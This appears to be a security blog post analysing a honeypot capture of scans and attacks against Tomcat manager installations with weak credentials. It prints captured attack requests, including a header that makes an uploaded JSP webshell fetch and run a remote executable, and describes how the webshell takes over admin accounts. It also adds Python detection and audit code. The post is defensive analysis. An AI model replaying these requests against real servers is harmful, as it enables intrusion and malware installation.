Scans for Tomcat installations with weak passwords

We noticed some slightly odd HTTP scans probing for /manager/html on our honeypots. A closer look at the request made it pretty apparent what they were after:

Fri Mar 25 00:30:31 EET 2009 – /190.210.x.x:3625 -

GET /manager/html HTTP/1.1
Referer: http://x.x.x.x:8080/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)
Host: x.x.x.x:8080
Connection: Close
Cache-Control: no-cache
Authorization: Basic YWRtaW46YWRtaW4=

So someone is clearly scanning for Tomcat installations that have the manager application deployed and accept admin:admin as credentials. Rather than fiddling with low-interaction honeypots we set up a live Tomcat installation with exactly those credentials and placed a machine running tcpdump between the Tomcat host and the router. After a day of waiting and watching an attacker came by:

190.26.x.x - admin [26/Mar/2009:21:32:13 -0000] "GET /manager/html HTTP/1.1" 200 8714
190.26.x.x - admin [26/Mar/2009:21:32:13 -0000] "POST /manager/html/upload HTTP/1.0" 200 8747
190.26.x.x - - [26/Mar/2009:21:32:15 -0000] "GET /killfexcepshell/index.jsp HTTP/1.1" 404 763
190.26.x.x - admin [26/Mar/2009:21:32:38 -0000] "POST /manager/html/upload HTTP/1.0" 200 9377
190.26.x.x - - [26/Mar/2009:21:32:43 -0000] "GET /killfexcepshell/index.jsp HTTP/1.1" 200 48

As we can see, after probing the honeypot and finding a Tomcat server with weak credentials, the attacker uploads something. Note that the manager's HTML interface answers a failed deploy with HTTP 200 and a "FAIL" message in the page body, so the two POSTs above cannot be told apart by status code; the 404 on index.jsp after the first upload shows that only the second one actually deployed the application:

POST /manager/html/upload HTTP/1.0
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=---------------------------032509203251046
Content-Length: 2495
Host: x.x.x.x:8080
Accept: text/html, */*
Accept-Language: zh-cn
Referer: http://x.x.x.x:8080/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Authorization: Basic YWRtaW46YWRtaW4=
-----------------------------032509203251046
Content-Disposition: form-data; name="deployWar"; filename="C:\WINDOWS\system32\mui\fexcep\killfexcepshell.war"
Content-Type: application/x-zip-compressed

And what does the WAR contain? This:

cexcep

As the POST shows (note the Windows path in the filename), the infection is most likely coming from a Windows host. What struck my eye is that even though the IP address is in Colombia, the client sends "Accept-Language: zh-cn", which suggests a Chinese origin for the malware. Another interesting point is that the attacker also fetched the GIF images that appear in the manager page. That suggests it is not a custom bot but more likely something driving a hidden Internet Explorer window. But let's check the rest.

Once the upload has succeeded, what does it do? It makes only one more request, GET /killfexcepshell/index.jsp, and after that nothing.

So let's take a closer look at that last request:

GET /killfexcepshell/index.jsp HTTP/1.1
Referer: http://x.x.x.x:8080/killfexcepshell/index.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; IE 7)
Host: x.x.x.x:8080
Connection: Close
Cache-Control: no-cache
Cache-Vip-Url:http://www.<hidden>.cn/tomcat.exe

And the last response:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=26482330DBFE986AC0705B4691E0C66D; Path=/killfexcepshell
Content-Type: text/html;charset=utf-8
Content-Length: 48
Date: Thu, 26 Mar 2009 01:32:43 GMT
Connection: close

Failure!Because Remote computer system is Linux!
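A detection pass over captures like the ones above, as an added example that is not part of the original post: it decodes the Basic credential in the scan request, lists request headers a browser would not send (such as Cache-Vip-Url), and correlates the access-log sequence of manager probe, WAR upload and first hit on the newly deployed context. All sample data is constructed to mirror the capture; the addresses, the dropper URL and the list of default credentials are assumptions, not the scanner's own wordlist.

```python
"""Spot the manager-probe / WAR-upload / webshell-hit pattern from a Tomcat capture.

Added example, not code from the original post.  Sample requests and log lines
are constructed (placeholder addresses and URLs); WEAK_CREDS is an assumed list.
"""
import base64
import re

# Credential pairs manager scanners are known to try (assumed list).
WEAK_CREDS = {("admin", "admin"), ("tomcat", "tomcat"), ("admin", ""),
              ("manager", "manager"), ("admin", "password"), ("tomcat", "s3cret")}

# Headers a normal browser sends; anything else deserves a look.
COMMON_HEADERS = {"host", "user-agent", "referer", "connection", "cache-control",
                  "accept", "accept-language", "accept-encoding", "accept-charset",
                  "authorization", "content-type", "content-length", "cookie", "pragma"}

# Tomcat AccessLogValve "common" pattern: ip - user [date] "req" status bytes
CLF_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')


def decode_basic(value):
    """Return (user, password) from an Authorization header value, or None."""
    scheme, _, token = value.strip().partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    user, _, password = raw.partition(":")
    return user, password


def inspect_request(raw):
    """Classify the credentials and list non-browser headers of one raw HTTP request."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in head[1:]:
        name, _, val = line.partition(":")  # tolerates "Name:value" without a space
        headers[name.strip().lower()] = val.strip()
    creds = decode_basic(headers.get("authorization", ""))
    cred_class = "none" if creds is None else ("weak-default" if creds in WEAK_CREDS else "other")
    odd = sorted(h for h in headers if h not in COMMON_HEADERS)
    return {"request": head[0], "credentials": cred_class, "odd_headers": odd}


def find_manager_abuse(lines):
    """Flag manager probes, WAR uploads and hits on a context deployed right after one.

    Caveat: the manager's HTML interface answers a failed deploy with HTTP 200 and a
    "FAIL" body, so a 200 on /manager/html/upload alone does not prove success; the
    follow-up request to the new context is the better signal (404 = deploy failed).
    """
    alerts, uploaders = [], set()
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue
        ip, path = m["ip"], m["path"]
        if m["method"] == "POST" and path.startswith("/manager/html/upload"):
            uploaders.add(ip)
            alerts.append((ip, "war-upload", path))
        elif path.startswith("/manager/"):
            alerts.append((ip, "manager-probe", path))
        elif ip in uploaders and path.endswith(".jsp"):
            alerts.append((ip, "new-context-hit", path))
    return alerts


# Constructed samples modelled on the capture (documentation-range addresses).
SCAN_REQUEST = ("GET /manager/html HTTP/1.1\r\n"
                "Referer: http://192.0.2.10:8080/manager/html\r\n"
                "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)\r\n"
                "Host: 192.0.2.10:8080\r\nConnection: Close\r\nCache-Control: no-cache\r\n"
                "Authorization: Basic YWRtaW46YWRtaW4=\r\n\r\n")
TRIGGER_REQUEST = ("GET /killfexcepshell/index.jsp HTTP/1.1\r\n"
                   "Referer: http://192.0.2.10:8080/killfexcepshell/index.jsp\r\n"
                   "Host: 192.0.2.10:8080\r\nConnection: Close\r\nCache-Control: no-cache\r\n"
                   "Cache-Vip-Url:http://dropper.example/tomcat.exe\r\n\r\n")
SAMPLE_LOG = """\
198.51.100.7 - admin [26/Mar/2009:21:32:13 -0000] "GET /manager/html HTTP/1.1" 200 8714
198.51.100.7 - admin [26/Mar/2009:21:32:13 -0000] "POST /manager/html/upload HTTP/1.0" 200 8747
198.51.100.7 - - [26/Mar/2009:21:32:15 -0000] "GET /killfexcepshell/index.jsp HTTP/1.1" 404 763
198.51.100.7 - admin [26/Mar/2009:21:32:38 -0000] "POST /manager/html/upload HTTP/1.0" 200 9377
198.51.100.7 - - [26/Mar/2009:21:32:43 -0000] "GET /killfexcepshell/index.jsp HTTP/1.1" 200 48
203.0.113.9 - - [26/Mar/2009:21:40:00 -0000] "GET /index.jsp HTTP/1.1" 200 120
""".splitlines()

if __name__ == "__main__":
    print(inspect_request(SCAN_REQUEST))
    print(inspect_request(TRIGGER_REQUEST))
    for alert in find_manager_abuse(SAMPLE_LOG):
        print(alert)
```

Run against a real access log the new-context rule will also fire on legitimate deployments, so treat it as a correlation rule for the manager-probe and weak-credential signals rather than an alert on its own; the request-header check only sees headers if the access log pattern or a packet capture records them.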

Umm, Cache-Vip-Url? Pointing to an executable in China? Must be Very Important indeed. Let's take a look at what index.jsp does (not necessarily in this order):

  • It rewrites tomcat-users.xml to contain the following:

<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
<role rolename="tomcat"/>
<role rolename="role1" />
<role rolename="manager"/>
<role rolename="admin"/>
<user username="admin" password="<hidden>" roles="admin,manager"/>
</tomcat-users>

In other words, it locks the legitimate administrator out of the manager by replacing the password, while keeping an admin/manager account for itself.

  • It downloads a file. The download URL is taken from the Cache-Vip-Url request header; after downloading it tries to execute the file, but as the response above shows this fails because our honeypot was running Linux.

We have hidden the password in the snippet above because the authors have a bug in their package: it is supposed to generate a random password for each infected Tomcat, but someone had a brainfart during the coding and the generation does not work, so the password is static across infections.
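The rewritten tomcat-users.xml above is the one artifact this infection reliably leaves on disk, and because the attacker's static password is not in any default wordlist, a password-strength check alone will not catch it. The following is an added example, not code from the original post or from Tomcat, that audits a tomcat-users.xml for privileged accounts with guessable passwords and, more usefully here, diffs it against the file the administrator last deployed. The XML samples are constructed; the attacker's hidden password and the hardened password are placeholders, the role names cover both Tomcat 6 ("manager"/"admin") and the split roles introduced in Tomcat 7 ("manager-gui" and friends), and the default-password list is an assumption.

```python
"""Audit tomcat-users.xml: weak privileged passwords and drift from a known-good file.

Added example, not from the original post or Tomcat.  XML samples are constructed;
passwords are placeholders; DEFAULT_PASSWORDS is an assumed list.
"""
import xml.etree.ElementTree as ET

PRIVILEGED_ROLES = {"manager", "admin", "manager-gui", "manager-script",
                    "manager-jmx", "manager-status", "admin-gui", "admin-script"}
DEFAULT_PASSWORDS = {"", "admin", "tomcat", "password", "manager", "s3cret"}
MIN_PASSWORD_LEN = 12


def _local(tag):
    """Strip an XML namespace; Tomcat 7+ writes xmlns="http://tomcat.apache.org/xml"."""
    return tag.rsplit("}", 1)[-1]


def load_users(xml_text):
    """Map username -> {"password": str, "roles": set} from tomcat-users.xml text."""
    users = {}
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username") or el.get("name")  # very old files use name=
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        users[name] = {"password": el.get("password", ""), "roles": roles}
    return users


def audit_users(xml_text, baseline=None):
    """Return human-readable findings; an empty list means nothing to report."""
    findings = []
    users = load_users(xml_text)
    for name, u in sorted(users.items()):
        priv = sorted(u["roles"] & PRIVILEGED_ROLES)
        pw = u["password"]
        if priv and (pw in DEFAULT_PASSWORDS or len(pw) < MIN_PASSWORD_LEN):
            findings.append(f"{name}: weak password on privileged account ({', '.join(priv)})")
    if baseline is not None:  # the check that actually catches the rewrite above
        base = load_users(baseline)
        for name in sorted(set(users) | set(base)):
            if name not in base:
                findings.append(f"{name}: account not in baseline")
            elif name not in users:
                findings.append(f"{name}: account removed")
            elif users[name] != base[name]:
                findings.append(f"{name}: password or roles changed since baseline")
    return findings


# What the honeypot ran: exactly the credentials the scanner was looking for.
HONEYPOT_USERS_XML = """<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
  <role rolename="manager"/>
  <role rolename="admin"/>
  <user username="admin" password="admin" roles="admin,manager"/>
</tomcat-users>"""

# What index.jsp wrote (password is a placeholder for the one hidden in the post).
TAMPERED_USERS_XML = """<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <role rolename="manager"/>
  <role rolename="admin"/>
  <user username="admin" password="static-password-hidden-in-post" roles="admin,manager"/>
</tomcat-users>"""

# A sane file to keep as the baseline: one named deployer, manager role only,
# long random password (placeholder value here).
HARDENED_USERS_XML = """<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
  <role rolename="manager"/>
  <user username="ops-deployer" password="placeholder-32-char-random-secret" roles="manager"/>
</tomcat-users>"""

if __name__ == "__main__":
    print(audit_users(HONEYPOT_USERS_XML))
    print(audit_users(HARDENED_USERS_XML))
    print(audit_users(TAMPERED_USERS_XML, baseline=HARDENED_USERS_XML))
```

Keep the baseline copy outside the Tomcat tree (a JSP running as the Tomcat user can overwrite anything under conf/), and remember that the script only reads the file; restricting the manager to trusted addresses and not exposing port 8080 to the Internet is what keeps the file from being rewritten in the first place.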

The binary that gets downloaded when the Tomcat server runs on Windows is a malware variant commonly known as PcClient, basically a remote administration tool that connects to its C&C at <hidden>.vicp.net on TCP port 126.

This is a good example of the blackhats trying any way they can to wriggle into computers. Tomcat is not that common to run into, and Tomcat has not shipped default credentials for the manager application in the past several years. Still, that vector is actively being scanned for as a free passage into computers.

2 Responses to “Scans for Tomcat installations with weak passwords”

  1. Hi!

    That’s a useful post…this just happened to me.

    I think I have a “strong password” configured in my Tomcat Server, however I saw this Application installed.
    How come it got installed?

    My tomcat User’s file looks sane however…

    Any comments? :)

    Thanks!

  2. admin says:

    Have you checked the logfiles? If you want I can take a look at them to see if there are additional installation vectors.
    Also if you have the uploaded .war or the installed filestructure (inside webapps) I’d love to take a look at them.
